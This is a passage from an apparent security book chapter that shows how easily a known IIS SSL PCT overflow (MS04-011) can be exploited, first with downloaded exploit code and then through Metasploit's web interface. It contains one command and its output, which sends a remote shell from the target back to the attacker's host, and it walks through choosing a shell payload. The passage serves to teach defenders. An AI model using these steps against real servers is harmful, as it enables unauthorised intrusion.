Point-And-Click Exploitation Using Metasploit

The Metasploit Framework is an open -source platform for developing, testing, and launching exploit code. It is easily amplified with pluggable exploit modules contributed by the worldwide community of folks engaged in "legal penetration testing and research purposes only," according to the Metasploit web site. Metasploit runs on most Linux/UNIX platforms with Perl available. A Cygwin-based version is provided for Windows systems. Metasploit provides for easy exploitation of all types of vulnerabilities, including web platform holes. For those interested in a commercially-supported tool like Metasploit, check out CORE IMPACT from Core Security Technologies, or CANVAS by Immunity. For links to further information about Metasploit, CORE IMPACT, and CANVAS, see "References and Further Reading" at the end of this chapter.

To understand the ease-of-use that Metasploit provides, we'll first walk through an example of exploiting a common web platform software defect the old-school way, without the Framework. As we saw in Chapter 2, it's fairly straightforward to discover the make and model of a web server. It's also no real stretch to research published vulnerabilities in the identified server software. Let's take, for example, the SSL PCT remote buffer overflow condition that exists for IIS, as described in Microsoft Security Bulletin MS04-011. Now, all an attacker needs to do is find some exploit code. For this example we went to www.k-otik.com and found a very useful packaged exploit for the SSL PCT vulnerability.

After downloading the exploit code and naming it iisexploit.c, we attempt to compile it. For the average script- kiddie , getting exploit code to compile is not always a simple task, especially with code that is likely cobbled together from multiple sources with injudicious (and often purposefully mischievous) splicing. Sometime later, after resolving multiple compiler errors related to missing header files, libraries, invalid references, and so on, plus a couple of trips to Google to remind us how to set basic compiler parameters, we now have our iisexploit.exe ready to run.

Launching iisexploit.exe from the command line is fairly straightforward (relative to compiling it):

 C:\>  iisexploit www.site.com myserver 8082  THCIISSLame v0.3 - IIS 5.0 SSL remote root exploit tested on Windows 2000 Server german/english SP4     by Johnny Cyberpunk (jcyberpunk@thc.org)     [*] building buffer [*] connecting the target [*] exploit send [*] waiting for shell [*] Exploit successful ! Have fun ! 

The exploit returns a shell to the attackers system on the pre-determined port 8082. As you just witnessed, exploiting a known vulnerability is quite simple and doesn't require much work. But in our culture of immediate gratification, the process we just drilled through is still too much work. And, frankly, we're lazy and have books to write. So we want the easy way, and thankfully there are useful applications that automate the entire process.

We'll now walk through the same example using Metasploit to illustrate the power and efficiency of the tool, even in the hands of semi-skilled adversaries. We first grab the Framework distribution, install it, and we're ready to roll with prepackaged exploits within five minutes. Metasploit even sports a swift installation wizard. How convenient and people think hacking is hard work. Once installed, Metasploit can be accessed by either its command line or web interfaces. Since we're big fans of web applications, we'll use the web GUI for our demonstration.

After launching Metasploit, we see a listing of all of the exploits it supports, as shown in Figure 3-1.

We spot the Microsoft SSL PCT overflow exploit and select it. Metasploit then displays a helpful screen that provides a description of the vulnerability, complete with references! In the screen shown in Figure 3-2, we choose the type of system our target is running. Our earlier research told us that the web server is running Win2k SP1, so we select that version.

After selecting the target, Metasploit displays the next screen that enables us to select from a number of payloads that can be delivered to the server. For this attack, a simple remote shell would be a good choice. Once we hit the Exploits button, Metasploit displays the success status of the payload delivery, and we're presented with console access to the remote server, as shown in Figure 3-3.

See how easy that was? Now where's the fun in that?